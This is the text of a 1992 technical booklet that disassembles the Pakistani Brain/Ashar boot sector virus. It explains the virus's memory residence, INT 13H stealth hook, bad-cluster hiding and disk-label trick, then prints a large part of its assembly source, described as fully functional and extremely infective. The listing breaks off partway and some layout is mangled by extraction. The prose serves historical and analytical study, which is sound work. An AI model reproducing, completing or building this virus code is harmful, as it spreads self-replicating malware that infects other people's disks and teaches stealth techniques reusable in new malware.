Technical Notes #1 - pudn.comread.pudn.com/downloads165/sourcecode/asm/756887/tnote1.pdfmonitoring is accomplished by hooking the BIOS interrupt 13H, which is the BIOS disk/diskette

Technical Notes #1

A Disassembly ofThe Pakistani Brain /

Ashar-B Virus

By Mark A. Ludwig

© 1992 American Eagle Publications, Inc. All rights reserved. None ofthe contents of this booklet may be reproduced in any form without theprior written permission of American Eagle Publications, Inc. Executablecode for the Brain is in the public domain.

For a free descriptive catalog of other interesting publications, write to:

American Eagle Publications, Inc.Post Office Box 41401Tucson, Arizona 85717

WARNING: This booklet contains compete sourcecode for a live computer virus which couldbe extremely dangerous in the hands ofincompetent persons. You could be heldlegally liable for the misuse of this virus,even if such misuse is unintentional. Donot attempt to execute any of the code inthis booklet unless you are well versed insystems programming for personal com-puters, and you are working on a carefullycontrolled and isolated computer system.American Eagle Publications makes nowarranty as to the safety of executing anycode in this booklet, and no warranty thatthe code herein will function as described.

Contents

1. Introduction 12. Basic Functional Characteristics 13. How the Virus Hides in Memory 24. Disk Access When the Virus is Resident 35. How the Virus Infects a Disk 56. An Explanation of the Source Code 97. The Source Code 118. The Hex Listing 249. The Virus Loader 2610. Notes on Variations 2911. Detection and Disinfection 3012. Bugs 3113. References 3214. Appendix A: The Hex Loader 32

Rev. 2

1. Introduction

This booklet contains a complete, commented disassembly of apopular version of the Pakistani Brain virus, known as the Pakistani Brain/Ashar B virus, along with a detailed description of how it works.

The Brain was introduced in 1986 by two brothers in Lahore, Paki-stan. It was evidently placed on diskettes they distributed to discouragebootlegging of their software. (Perhaps this explains why the virus putsthe infamous “(c) Brain” copyright notice in the disk label in such a waythat it cannot be removed.) Of course, the virus didn’t discourage boot-legging. Instead, it has spread all around the world and become one of themost successful computer viruses in existence.

This particular version is known as the Ashar variant, and sometimesas the Shoe Virus since it contains the words “(c) ashar” and “VI-RUS_SHOE RECORD” in it. This version is marked as “v9.0" althoughit is not the only version 9.0 around.

2. Basic Functional Characteristics

The Brain virus is a boot sector virus which infects only 360 Kilobytefloppy diskettes. This version cannot infect hard disks, 3 1/2" diskettes or1.2 megabyte diskettes. It was obviously written for the old PC/XTenvironment. The version described here is also benign, and causes nointentional damage to a system it has infected. However, I have noticedthat it will not function with all systems. Apparently it has an interruptconflict with the BIOS upon boot-up on some systems, which causes theboot-up sequence to fail, leaving the machine in a hung state, rather thanat an A: prompt. (This can easily be remedied, for experimental purposes,as described in Section 12.)

The Brain was not only one of the first computer viruses, but also thefirst “stealth” virus which attempted to fool the operating system intobelieving that the boot sector was not infected by redirecting all attemptsto read Cylinder 0, Head 0, Sector 1 (where the real boot sector resides)to a pre-assigned location where the original boot sector had been storedby the virus. Thus all attempts to locate the virus in the boot sector on aninfected system would find only the original boot sector, provided one didall disk access through the BIOS (and DOS, which uses the BIOS). Inorder to redirect attempts to read the boot sector, the virus installs itself inhigh DOS memory (at the top of the 640K limit), and hooks Interrupt 13H(Disk BIOS). It then filters every call to the BIOS from this interrupt.

The Pakistani Brain/Ashar Virus 1

Brain hides itself on disk by marking a group of clusters on thediskette as bad, and then it stores itself in that area. This technique protectsthe virus from being overwritten by all normal operating system filemanipulation, since DOS normally ignores sectors marked bad and neverattempts to read or write to them.

Brain plays one prank, which might be considered malicious: Itchanges (or adds) the disk label to a copyright notice “(c) Brain”. Sincethis copyright notice contains lower case letters, which DOS does notrecognize, it cannot be removed from the directory without going in anddirectly editing the directory entry with a special software tool like PCTools, Xtree or Norton. The LABEL command will simply fail to deletethe old label on the disk, so “(c) Brain” will stay there.

These comments, of course, all refer to the version of Brain / Ashardescribed in this booklet. There are many hacked versions of the virusfloating around, since it is fairly old, and it was a pretty good virus to startwith. Some are quite able to infect a hard disk and different types offloppies, some are capable of doing damage, and some are just messed upversions put out by amateurs.

3. How the Virus Hides in Memory

When a disk containing the Brain is booted, the viral boot sector isloaded at memory location 0000:7C00H and executed. In that boot sectorare pointers START_HEAD and START_SECCYL which tell the viruswhere to find the original boot sector and the rest of itself. Upon execution,the virus immediately loads the rest of its code into memory at0000:7E00H, right above the viral boot sector.

Next, the viral boot sector moves the whole virus, including itself, tohigh memory. To go memory resident before DOS is resident, and to avoidbeing overwritten by DOS when it loads, the Brain uses a technique whichhas become fairly common among viruses: It examines the BIOS variableMEM_SIZE at 0040:0013H, which contains the number of kilobytes ofbase memory physically available in the system (up to 640K). Since DOSuses this variable to determine how much memory it should occupy, thevirus can reserve some memory for itself by decrementing this variable.In so doing it stays completely outside the control of DOS. The Braindecrements MEM_SIZE by 7, thereby allowing itself 7K of memory.

Next, the Brain copies itself to this high memory area, and transferscontrol to itself there via a far return to offset 200H. Once the code in highmemory is executing, it takes the interrupt 13H vector, as set up by theBIOS, and moves it to the vector for interrupt 6DH (labeled BDSK_INTin the disassembly here). The virus then installs its own interrupt 13H

2 Technical Notes #1

handler. It is only through anINT 13H that the virus is ac-cessed once the boot process iscomplete. That, however, is arelatively frequent occurrenceon a PC.

Finally, the Brain retrievesthe original boot sector fromwhere it was stored on the diskwhen the disk was infected.(The first sector of the hiddenarea, right before the main bodyof the virus.) It loads that bootsector into the usual location,0000:7C00H, and executes it,allowing the boot sector to at-tempt to boot whatever operat-ing system is on the disk. AsDOS (or another operating sys-tem) boots, it checksMEM_SIZE to see how muchmemory it has to operate in, andmakes the necessary adjust-ments. Since MEM_SIZE hasalready been adjusted by the vi-rus, the operating system justhappily makes room for the vi-rus and goes about its businesswith no knowledge that the vi-rus is present.

4. Disk Access When the Virus isResident

The Brain monitors all disk access once it is installed in memory. Thismonitoring is accomplished by hooking the BIOS interrupt 13H, which isthe BIOS disk/diskette interrupt handler as described in Section 3. Everyread and write to disk, every formatting operation, etc., is normallyaccomplished through this handler. The DOS file i/o functions, whichoperate at a much higher level, accomplish everything they do through

ROMBIOS

Brain

DOS

INT 6DH VECTOR

INT 13H VECTOR

ME

M_S

IZE

Mem

ory

Act

ual B

ase

Mem

ory

Fig. 1: The Brain in memory.


multiple calls to interrupt 13H. For example, if a program asks to open aparticular file and read it, DOS must use INT 13H to read the diskdirectory into memory and scan through it to find the file to open. Next,DOS uses the starting cluster number in the directory entry to calculatethe absolute Cylinder, Head and Sector number where the file starts. Itthen uses INT 13H to begin reading the file. After the first cluster, DOSmust read the FAT table, located at the beginning of the disk, to findsubsequent clusters allocated to the file, translating them into Cylinder,Head, Sector locations and reading them one by one, all using INT 13H .

Since a boot sector virus like Brain is loaded before DOS, it can hookinterrupt 13H before DOS does, so every disk access from there on out istraced by the virus, be it high level accesses through DOS, or low levelaccesses directly through BIOS. The only way to circumvent this interrupthook is to write a piece of software which directly interacts with the diskcontroller via the relevant i/o ports to read and write to the disk.

The Brain is a stealth virus because it attempts to hide itself fromobservation by a user poking around on a disk. The system employed bythe Brain is fairly straight forward:

To protect the viral boot sector, part of Brain’s interrupt 13H hooklooks for attempts to read it at Cylinder 0, Head 0, Sector 1. Any attemptsto read this sector on an infected diskette are redirected to read the originalboot sector from the area Brain reserved for itself when it infected thediskette being read. Thus, the virus’ boot sector, which resides at Cylinder0, Head 0, Sector 1 is effectively blocked from being read via interrupt13H. In the event that the diskette is not infected, the Brain will go infectthe diskette, as described in Section 5, and then return the original bootsector to the caller.

To protect the main body of the virus, the Brain marks an area of thedisk bad when it infects it. (See Section 5.) The main body of the virus,and the original boot sector are stored in this “bad” area. By marking anarea bad, the Brain tells DOS never to read or write those sectors,effectively stopping inspection of these areas.

Using this strategy, the Brain insures that DOS will never overwriteit, and nothing will appear to be wrong with the disk. Bad sectors are anormal occurrence. And if the operating system or a utility programattempts to read the boot sector, one gets only the original boot sector.


5. How the Virus Infects a Diskette

This version of the Brain virus only infects 360 Kilobyte floppydiskettes. It cannot infect hard drives, and it will not infect other types ofdiskettes that it does not recognize.

The Brain infects a diskette from within an intercepted call to inter-rupt 13H. Generally, it will infect a disk under two circumstances:

1) An attempt is made to read the boot sector on an uninfected disk.2) Four read operations are performed on the disk.

The second mode of infection appears to be a cover for unusualsituations, as the boot sector is usually one of the first things read when anew disk is loaded. Both triggers use exactly the same routine to infect adiskette.

The first step in infecting a disk is to determine whether it has alreadybeen infected. To do this, the virus reads the actual boot sector usinginterrupt 6DH (which is the true BIOS disk interrupt when the virus isresident). The virus then looks for its signature, 1234H, at offset 5 in theboot sector. If found, the virus recognizes that the disk is already infectedand goes on to handle the interrupt 13H, redirecting the read operation ifnecessary.

If the Brain’s signature is not present on a disk, the virus will attemptto infect the disk. The infection process is broken up into two mainprocedures, called INFECT_DISK and PUT_LABEL in this disassembly.The virus does a pretty good job checking for errors and handling them.PUT_LABEL is only called after INFECT_DISK has successfully putthe virus on the disk. If INFECT_DISK encounters a problem at anypoint, it returns with the carry flag set, and PUT_LABEL is then skipped.

The infection process looks like this:

1) Make sure the disk is the 360K format.2) Modify the FAT to allocate space to hide the virus.3) Read the original boot sector from Cylinder 0, Head 0, Sector 1.4) Write the original boot sector back to disk in the first sector of

the hidden area.5) Write the virus’ boot sector to Cylinder 0, Head 0, Sector 1.6) Put the label “(c) Brain” on the disk.

Central to this infection process is the FAT modification. The Brain scansthe disk to find some empty space where it can store itself, and then marksthe FAT tables as bad in that location, so nothing else will overwrite thatarea. Then, the virus can safely store itself in this area.


To protect the main body of the virus, Brain marks the clusters whereit resides as bad in both FAT tables on the disk. Normally, when a disketteis formatted, the FORMAT program verifies each cylinder as it isformatted. If it has any trouble verifying a cylinder, it marks the relevantclusters bad in the FAT table on the disk. DOS then avoids those clustersin every disk access. If it did not, the disk drive would hang up on thosesectors every time something tried to access them, until the programaccessing them timed out. This is an annoying sequence of events you maysometimes experience with a disk which has some bad sectors on it thatwent bad after it was formatted.. Brain makes use of this feature of DOSto hide on the disk. After finding a blank area of the disk, it marks therelevant clusters bad in both FAT tables on the disk. Then it copies themain body of the virus out there.

On a 360K floppy, the FAT’s are two sectors long each, and they keeptrack of 355 clusters using 12 bit table entries. The first FAT begins inCylinder 0, Head 0, Sector 2, and the second begins in Cylinder 0, Head0, Sector 4. (They are always back-to-back.) The first byte in the FATtable tells the disk type. A 360K disk is identified with an FDH in thisbyte. When the Brain infects a disk, INFECT_DISK first calls MOD-IFY_FAT . This procedure reads both FAT’s into memory and checks thefirst two bytes. If that word is anything other than FFFDH, MODIFY_FATreturns control to INFECT_DISK and signals an error. The infectionprocess is immediately stopped, so that disk will be left alone.

If the disk checks out, then MODIFY_FAT searches the disk for threeconsecutive free clusters (FAT entry 0) (1 cluster = 2 sectors = 1024 bytes).If it finds them, it marks them as bad by putting an FF7 in the threecorresponding FAT entries (in both FAT’s). Although the operation of theFAT is detailed in a number of books, we will go over it here forcompleteness’ sake. Each entry in the FAT table corresponds to a clusterof two sectors on a 360K disk. Entries in the FAT form chains which, inconjunction with the directory entries, tell the operating system how toread files from the disk. FAT entries may take the following values:

Entry Meaning

0 Empty cluster—no data is stored in this cluster 1-355 Pointer to the next cluste in the chain. This cluster contains data,

and it is not the last cluster in the file. FF7 A bad cluster. DOS avoids this cluster and never attempts to read

or write to it. FFF The last cluster in a chain. This cluster contains data, and it is the

last cluster in the file.


A typical FAT table looks something like this:

Since the FAT entries are 12 bits each, reading and writing them isless than trivial. Entries are paired off, and take up 3 bytes per pair. Brainaccomplishes this decoding using the procedures READ_FAT_ENTRYand WRITE_BAD_FAT. The third entry in the FAT table (entry number2, starting in byte 3) is the first one that is actually used to store allocationdata. It corresponds to the cluster stored in Cylinder 0, Head 1, Sector 4on the 360K diskette. All the culusters are stored sequentially after thefirst. Thus one may compute the Cylinder/Head/Sector location of anycluster in a straight forward way. The Brain uses the routineCOMP_HD_TRK_SEC to accomplish this.

Once Brain has found three consecutive free clusters on the disk andsuccessfully marked them bad, it is ready to move itself there. First, itmoves the original boot sector from its normal location (Cylinder 0, Head0, Sector 1) to the first sector of the hidden area. Right after this, it writesfive sectors of the main body of the Brain. Then it places the viral bootsector in Cylinder 0, Head 0, Sector 1. Note that before the viral boot sectoris written to disk, the fields START_HEAD and START_SECCYL aremodified to reflect the new Cylinder/Head/Sector of the original bootsector. This makes it possible for the viral boot sector to locate the hiddenarea on the newly infected disk when it is booted.

At this point, INFECT_DISK completes its operation. If the disk isbooted, the Brain will load itself into memory. The final step in theinfection process is to put the label “(c) Brain” on the disk. To do this,PUT_LABEL and WRITE_LABEL search the root directory to find eitheran existing label entry or an empty entry, and put “(c) Brain” there usingan obtuse routine USE_DIR_ENTRY detailed in Section 6.

0000 FD FF FF 03 40 00 05 60 00 FF 8F 00 09 A0 00 0B0010 C0 00 0D E0 00 0F 00 01 11 20 01 13 40 01 15 600020 01 17 80 01 19 A0 01 1B C0 01 1D E0 01 1F F0 FF0030 00 00 00 00 00 00 00 00 F7 7F FF F7 7F FF F7 0F

Entry 0 and 1: Disk ID in first byte.Entry 2: Pointer to entry 3.

Entry 3: Pointer to entry 4.Entry 6: End of file mark.

Entry 7: (New file) Points to 8.

Empty Clusters

Bad Clusters


Finding an appropriate dirctory entry is fairly easy. The root directoryof a 360K disk is an array of 112 thirty two byte entries starting at Cylinder0, Head 0, Sector 6. The label contains only an 11 byte name field and anattribute byte set to “label” (= 8). These form the first 12 bytes of the 32byte directory entry. So PUT_LABEL reads the directory into memory,and WRITE_LABEL searches for an entry in which either byte 0 is 0(blank entry/end of directory) or byte 11 is 8 (existing label). When eithercondition occurs, WRITE_LABEL passes control to USE_DIR_ENTRYwhich puts “(c) Brain” in that entry, and sets the attribute to a label.

Fig. 2: The Brain on disk.


6. An Explanation of the SourceCode

For the most part, the source code is pretty straight forward. The bootroutine (a) loads the main body fo the virus, (b) reserves some memory,(c) moves itself to that memory, (d) hooks interrupt 13H, (e) installs theBIOS’ disk handler as interrupt 6DH, (f) loads the original boot sector,and (g) executes it, passing control to the operating system. The viralinterrupt 13H handler looks for attempts to read the disk, redirecting readsof the boot sector, and infecting the disk when properly triggered. All ofthis is fairly easy to follow in the assembler comments in Section 7.

One section of the code demands some special attention: the routinewhich puts the label “(c) Brain” in the root directory. This is an extremelyobtuse and confusing piece of code. What it has succeeded in doing ispreserving the “(c) Brain” copyright notice, even though the virus has beenhacked a large number of times. Though it seems like a hacker would berather quick to change the label to read however he might fancy, thisobtuse code has prevented all but the most serious from tearing it apart.So the “(c) Brain” label survived in this virus, even though it has beenhacked from the original Brain, probably more than once.

Once the virus has successfully copied itself to a disk, it calls a routinewhich I call PUT_LABEL in the disassembly. PUT_LABEL callsWRITE_LABEL, and WRITE_LABEL jumps to USE_DIR_ENTRY.Although WRITE_LABEL has a few confusing things in it, you can figureit out with a little work, as long as you are sure those things aren’t justrandom trash—they’re all intentional. The fun really begins inUSE_DIR_ENTRY. Here is that section of code, with its binary repre-sentation to the left:

B1 51 FUN_CODE: MOV CL,51H ;181 C2 4C 44 ADD DX,444CH ;this is the code ;2BF 55 25 MOV DI,2555H ;used as data ;3B9 03 0C MOV CX,0C03H ;4F3 A7 REPZ CMPSW ;5B8 46 0B MOV AX,0B46H ;6B9 03 00 MOV CX,0003H ;7D3 C0 ROL AX,CL ;AX=5A30H ;8 MOV TEMP_W3,AX ;put it here ;9 ;10 MOV CX,5 ;loop counter = 5 ;11 MOV DX,0008H ;nonsense ;12 SUB TEMP_W3,5210H ;TEMP_W3 = 0820H ;13 PUSH TEMP_W3 ;14 ;BX=OFFSET FUN_CODE ;15 LP1: MOV AH,BYTE PTR [BX] ;get byte from code ;16 INC BX ;move pointer up ;17 MOV DL,AH ;put it in ah ;18 SHL DL,1 ;19 JB LP1 ;if c, get another ;20 ;21


LP2: MOV DL,BYTE PTR [BX] ;get another here ;22 INC BX ;move pointer up ;23 MOV AL,DL ;put it in al ;24 SHL DL,1 ;25 JB LP2 ;if c, get another ;26 ;27 ADD AX,1D1DH ;add 1D1D ;28 PUSH AX ;put in label ;29 INC WORD PTR TEMP_W3 ;clear c ;30 JNB LP3 ;always jump ;31 DB 0EA ;nonsense ;32 LP3: LOOP LP1 ;33

This code uses the stack to push the proper characters into the necessarypositions in the directory entry to form a label “(c) Brain” for the disk. Itsets the stack up to point to the 12th byte of the directory entry where thelabel will go (in memory). The actual label is 11 bytes long, and theattribute byte is the 12th byte. (This attribute byte must be set to “label”by USE_DIR_ENTRY)

Once the stack is set up, the fun begins. A few strange instructionswhich seem to have no bearing on anything are executed. When disassem-bling it, one is tempted to say “I’m lost,” and assume one is in the middleof a data area and not code. Not so. These instructions may not be doinganything very useful, but they’re not hurting anything either.

After the oddball instructions, we come to an interesting routinewhich uses the instructions just executed as data to create the disk label.First (line 14) TEMP_W3 gets set to 0820H, and pushed. That sets theattribute to 8, which indicates a disk label, and the last byte of the label toa space (20H). next, the code loops 5 times to generate the other 10 bytesof the label (lines 16 to 33). The first time the label LP1 is reached, BX= OFFSET FUN_CODE. The byte pointed to by BX is loaded into AH,and shifted left once, the BX register is incremented, and if the left shiftdoesn’t carry, the byte is kept. Otherwise another byte is checked, untilno carry is obtained. That completed, the same thing is done again, puttingthe byte in AL this time. Once two bytes are obtained, 1D1DH is addedto AX, and AX is pushed. That makes it part of the label.

This process can be stepped through as follows:LOCATION (IP) BX AH AL CARRY CX LABEL

LP1 FUN_CODE B1 YES 5 _ _ _ _ _ _ _ _ _ _ +1 51 NOLP2 +2 51 81 YES +3 C2 YES +4 4C NOADD AX,1D1DH +5 6E 69PUSH AX _ _ _ _ _ _ _ _ i nLP1 +5 44 NO 4LP2 +6 44 BF YES +7 55 NOADD AX,1D1DH +8 61 72PUSH AX _ _ _ _ _ _ r a i nLP1 +8 25 NO 3LP2 +9 25 B9 YES +0A 03 NOADD AX,1D1DH +0B 42 20PUSH AX _ _ _ _ B r a i n


LOCATION (IP) BX AH AL CARRY CX LABEL

LP1 +0B 0C NO 2LP2 +0C 0C F3 YES +0D A7 YES +0E B8 YES +0F 46 NOADD AX,1D1DH +10 29 63PUSH AX _ _ c ) B r a i nLP1 +10 0B NO 1LP2 +11 0B B9 YES +12 03 NOADD AX,1D1DH +13 28 20PUSH AX ( c ) B r a i n

And there you have it, an incredibly obtuse piece of code thatproduces “(c) Brain” in the label!

7. The Source Code

Here is a complete assembly language listing of the Brain virus. Itcan be assembled using Turbo Assembler 2.0, Microsoft Assembler 5.0or A86 3.0. This listing is provided for information purposes only. It isextremely infective. Do not experiment with it except in a carefullycontrolled computing environment. Format all floppy disks after experi-menting!

;The Pakistani Brain Virus, Ashar 9.0 Version, or at least one variant of it.;This is a complete, byte for byte disassembly. It may or may not produce an;exact byte for byte copy of the virus, depending on which assembler you use,;but it will be fully functional.

;This will assemble with TASM Version 2.0, MASM 5.0 or A86 Version 3.09 (and ;probably others). (C) Copyright 1992 by American Eagle Publications, Inc.

.RADIX 16

VIRUSEG SEGMENT BYTE ASSUME CS:VIRUSEG, DS:VIRUSEG, ES:VIRUSEG, SS:VIRUSEG

BDSK_INT EQU 6DH ;Brain disk interrupt

int13_Off EQU 4CH ;interrupt 13H locationint13_Seg EQU 4EHint6d_Off EQU BDSK_INT*4 ;interrupt BDSK_INT locationint6d_Seg EQU (BDSK_INT*4)+2

INF_HEAD EQU 6 ;these are defined in BRAIN.ASMINF_SECTOR EQU 7 ;the BRAIN virus boot sectorINF_CYL EQU 8CURR_HEAD EQU 9CURR_SECCYL EQU 0AH

;******************************************************************************;The code at 100H is just a jump to 7C00H. Code for the extended sectors of the;virus must be compiled with an offset of 200H, as they will be executed;with that offset in high memory. Likewise, the viral Boot Sector must reside;at 7C00. The start at offset 100H with a jump just lets us assemble this file;as a COM file.


ORG 100H

COM_START: jmp BRAIN

;******************************************************************************;The following is the virus startup code, continued from the viral boot sector.;All it does is move the Interrupt 13H (Disk access) vector to BDSK_INT,;and replace the Interrupt 13H vector with its own handler, INT13_HNDLR. After;that, the virus loads the original boot sector from the hidden area where it;stored it, places it in the usual location at 0000:7C00, and then transfers;control to it.

ORG 200H

START_VIRUS: JMP SHORT VIRUS ;Beginning of hidden virus sectors

DB ’(c) 1986 Jork & Amjads (pvt) Ltd ’,0RD_COUNTER DB 4DRIVE_NO DB 0INFECT_FLAG DB 0

VIRUS: MOV BYTE PTR CS:RD_COUNTER,1FH XOR AX,AX MOV DS,AX ;ds=0

MOV AX,WORD PTR DS:int13_Off ;Move int 13H to int 6DH MOV WORD PTR DS:int6d_Off,AX ; MOV AX,WORD PTR DS:int13_Seg ; MOV WORD PTR DS:int6d_Seg,AX ;

MOV AX,OFFSET INT13_HNDLR ;redirect int 13H to virus MOV WORD PTR DS:int13_Off,AX MOV AX,CS MOV WORD PTR DS:int13_Seg,AX MOV CX,4 ;Retry count for disk read XOR AX,AX MOV ES,AX ;es=0VLOOP: PUSH CX MOV DH,BYTE PTR CS:INF_HEAD ;Attempt to read original boot MOV DL,0 ;sector from this trk/hd/sec MOV CX,WORD PTR CS:INF_SECTOR;as stored in BRAIN boot sec MOV AX,0201H MOV BX,7C00H ;Put it in usual boot sec loc INT BDSK_INT ;Clean disk read under BRAIN JNB GO_EXEC_BOOT ;Continue if no error MOV AH,0 ;If error, try to reset disk INT BDSK_INT POP CX LOOP VLOOP ;and loop until retry ctr 0 INT 18H ;if count expires, go to ROM

GO_EXEC_BOOT: DB 0EAH,0,7CH,0,0 ;jmp far ptr 0:07C00H NOP ;end of the virus startup code

;******************************************************************************;This is the virus’ Interrupt 13H (disk) handler. It is where all of the;interesting things happen. It filters all disk activity as long as the virus;is active.

INT13_HNDLR PROC FAR STI ;turn interrupts on CMP AH,2 ;is this interrutp a disk read? JNE DONT_PROCESS ;no, just let BIOS handle it CMP DL,2 ;is it a drive above 2? JA DONT_PROCESS ;yes, let BIOS handle it CMP CH,0 ;is it cylinder 0? JNE NOT_CYL_0 ;jump if not CMP DH,0 ;is it head 0?


JE RD_CYL0HD0 ;Cyl 0, Hd 0, go do nice things

NOT_CYL_0: DEC CS:RD_COUNTER ;miscelaneous disk read, dec ctr JNE DONT_PROCESS ;and if <> 0, pass to BIOS JMP SHORT RD_CYL0HD0 ;else see if it should infect

DONT_PROCESS: JMP NEAR PTR BIOS_DISK ;go pass control to BIOS

;if we get here, the virus is going to do something more than let BIOS process;the disk access.RD_CYL0HD0: MOV CS:INFECT_FLAG,0 ;clear this flag MOV CS:RD_COUNTER,4 ;reset read counter to 4 PUSH AX ;save registers now PUSH BX PUSH CX PUSH DX MOV BYTE PTR CS:DRIVE_NO,DL ;put drive number here MOV CX,4 ;retry counterBOOT_READ: PUSH CX MOV AH,0 ;attempt to reset diskette INT BDSK_INT ;using BIOS disk interrupt JB RESET_FAILED ;go handle an error if c set MOV DH,0 ;prep to read boot sector MOV CX,1 ;into buffer at es:bx MOV BX,OFFSET DISK_BUFFER PUSH ES MOV AX,CS MOV ES,AX MOV AX,201H ;read one sector INT BDSK_INT ;again use BIOS disk interrupt POP ES ;restore es JNB READ_OK ;go process successful readRESET_FAILED: POP CX ;else retry if disk op failed LOOP BOOT_READ JMP SHORT DISK_FAILURE ;retries expired, go fail NOP

READ_OK: POP CX ;clear retry counter off stack MOV AX,WORD PTR CS:RBRAIN_ID;look for infected disk CMP AX,1234H ;BRAIN_ID is 1234H if infected JNE NOT_INFECTED ;if not infected, go get it MOV CS:INFECT_FLAG,1 ;set flag to indicate infected JMP SHORT ALREADY_INFECTED ;and go continue processing ;NOT_INFECTED: PUSH DS ;come here if not infected yet PUSH ES ;save ds & es MOV AX,CS ;and set ds=es=cs MOV DS,AX MOV ES,AX PUSH SI CALL INFECT_DISK ;go infect the diskette JB INF_ERROR ;jump if it couldn’t do it MOV CS:INFECT_FLAG,2 ;else flag newly infected disk CALL NEAR PTR PUT_LABEL ;put (c) Brain label in root dirINF_ERROR: POP SI ;restore registers POP ES POP DS JNB ALREADY_INFECTED ;if successful, go finish int 13

DISK_FAILURE: MOV AH,0 ;else attempt disk reset INT BDSK_INT ;one last time

;Control comes here once the disk has been infected. Now the virus cleans up;and executes the interrupt 13H intended by the caller.ALREADY_INFECTED: POP DX ;restore these register POP CX POP BX POP AX CMP CX,1 ;an operation on boot sector? JNE BIOS_DISK ;no, let BIOS handle it CMP DH,0 ;still looking for boot sector


JNE BIOS_DISK CMP CS:INFECT_FLAG,1 ;boot sector, is disk infected? JNE INF_02 ;maybe not, go on MOV CX,CS:WORD PTR RSTART_SECCYL ;yes, read boot sector MOV DX,WORD PTR CS:RSTART_HEAD-1 ;from hidden area MOV DL,CS:DRIVE_NO ;where virus is JMP SHORT BIOS_DISK ;and let BIOS do the readINF_02: CMP CS:INFECT_FLAG,2 ;check for newly infected disk JNE BIOS_DISK ;nope, (should never happen) MOV CX,WORD PTR CS:INF_SECTOR ;yes, infected MOV DH,BYTE PTR CS:INF_HEAD ;orig boot sec loc stored hereBIOS_DISK: INT BDSK_INT ;do original BIOS disk interrupt RETF 2 ;interrupt return, keep flags

INT13_HNDLR ENDP

DB 0FH DUP (0) ;random bytes

;******************************************************************************;This routine modifies the FAT table on a 360K disk to accomodate the virus. It;looks for 3 contiguous open clusters in the FAT. To do this, it loads the FAT;into RAM and searches it. If it finds 3 contiguous clusters, it marks them;bad in RAM and then writes the FAT out to disk.

MODIFY_FAT PROC NEAR JMP SHORT PAST_CPYRT ;jump past the following data NOP

CLUSTER_CNT DW 3 ;counter used in this procedure

C_NOTICE DB ’ (c) 1986 Brain & Amjads (pvt) Ltd’

PAST_CPYRT: CALL READ_FAT ;read the FAT from disk into RAM MOV AX,WORD PTR DISK_BUFFER ;get diskette type CMP AX,0FFFDH ;is it a 360K DSDD diskette? JE DISK_360 ;if so, continue processing MOV AL,3 ;for any other kind, return al=3 STC ;and carry set RET

;Come here if it is a standard 360K DSDD disketteDISK_360: MOV CX,37H ;start looking at FAT entry 37H MOV [CLUSTER_CNT],0 ;zero cluster counterCLUST_LOOP: CALL READ_FAT_ENTRY ;get individual FAT entry CMP AX,0 ;if 0, that cluster is empty JNE NOT_EMPTY ;if not empty, reset CLUSTER_CNT INC [CLUSTER_CNT] ;else increment it CMP [CLUSTER_CNT],3 ;do we have 3 consecutive JNE FIND_ANOTHER ;clusters free? jump if not JMP SHORT SPACE_FOUND ;else this is where the virus NOP ;will go, go mark off the space

NOT_EMPTY: MOV [CLUSTER_CNT],0 ;last one wasn’t empty

FIND_ANOTHER: INC CX ;look at next cluster CMP CX,0163H ;make sure we’re not at end JNE CLUST_LOOP ;of disk, and check next cluster MOV AL,1 ;at end of disk, set al=1 STC ;set carry to indicate error RET ;and exit

;Found space on disk for virus, mark those clusters bad nowSPACE_FOUND: MOV DL,3 ;counter for clusters to markSF_LOOP: CALL WRITE_BAD_FAT ;mark cluster number cx bad DEC CX ;back up one cluster DEC DL ;decrement cluster counter JNE SF_LOOP ;loop until counter 0 INC CX ;cx points to first bad cluster CALL COMP_HD_TRK_SEC ;turn cx into cyl/hd/sec data CALL WRITE_FAT ;write both FATs back to disk MOV AL,0 ;set al=0 to indicate success


CLC ;clear carry RET ;and exitMODIFY_FAT ENDP

;******************************************************************************;This routine is passed a FAT entry number in cx, and it puts a bad cluster;marker (FF7 Hex) into that entry slot in both FATs in memory, stored at;DISK_BUFFER and DISK_BUFFER+400H.

WRITE_BAD_FAT PROC NEAR PUSH CX ;save cx and dx PUSH DX MOV SI,OFFSET DISK_BUFFER ;DISK_BUFFER where FAT is MOV AL,CL ;See if entry # is even or odd SHR AL,1 JB WR_ODD ;go handle odd FAT entry number CALL GET_FAT_OFFSET ;even, get offset of entry MOV AX,WORD PTR [BX+SI] ;read existing value AND AX,0F000H ;mask lower entry OR AX,0FF7H ;set lower entry to bad sector JMP SHORT WBF_DONE ;all done with even NOP

WR_ODD: CALL GET_FAT_OFFSET ;odd, get offset of entry MOV AX,WORD PTR [BX+SI] ;read existing value AND AX,000FH ;mask high entry OR AX,0FF70H ;set high entry to bad sector

WBF_DONE: MOV [BX+SI],AX ;write entry back to FAT in RAM MOV [BX+SI+400H],AX ;and write it to 2nd FAT also! POP DX ;restore DX and CX POP CX RET

WRITE_BAD_FAT ENDP

;******************************************************************************;This procedure reads the FAT entry number requested in cx and puts the result;in ax.

READ_FAT_ENTRY PROC NEAR PUSH CX ;save FAT entry number MOV SI,OFFSET DISK_BUFFER ;FAT is stored here MOV AL,CL ;See if AL is odd or even SHR AL,1 ;put parity bit in c JB DO_ODD ;and go handle the odd case CALL GET_FAT_OFFSET ;handle even / get proper offset MOV AX,WORD PTR [BX+SI] ;read entry into ax AND AX,0FFFH ;and mask lower entry off JMP SHORT RF_EXIT ;all done NOP

DO_ODD: CALL GET_FAT_OFFSET ;odd entry #, get offset MOV AX,WORD PTR [BX+SI] ;read entry into table AND AX,0FFF0H ;mask upper entry off MOV CL,4 ;and shift it down 4 bits SHR AX,CL

RF_EXIT: POP CX ;restore cx RET ;Return with ax=FAT entry

READ_FAT_ENTRY ENDP

;******************************************************************************;Find the offset of the FAT entry (in bytes) in the FAT table, which is stored;in RAM. The FAT entry number is passed to this procedure in cx, and the offset;is returned in bx. Each FAT entry takes up 12 bits on a 360K disk, so this;procedure essentially has to multiply the entry number by 1.5.


GET_FAT_OFFSET PROC NEAR PUSH DX ;preserve dx here MOV AX,3 ;multiply cx by 3 MUL CX SHR AX,1 ;and divide by 2 MOV BX,AX ;put result in bx POP DX RET

GET_FAT_OFFSET ENDP

;******************************************************************************;This reads both FAT tables from a 360K disk into the buffer DISK_BUFFER.

READ_FAT PROC NEAR MOV AH,2 ;set up read function CALL RD_WRT_FAT ;go perform the operation RET

READ_FAT ENDP

;******************************************************************************;This writes both FAT tables to a 360K disk from the DISK_BUFFER.

WRITE_FAT PROC NEAR MOV AH,3 ;set up write function CALL RD_WRT_FAT ;go perform the operation RET

WRITE_FAT ENDP

;******************************************************************************;This procedure actually performs the read or write function to read or;write the FAT from/to a 360 K disk. The disk command is passed to this;procedure in ah.

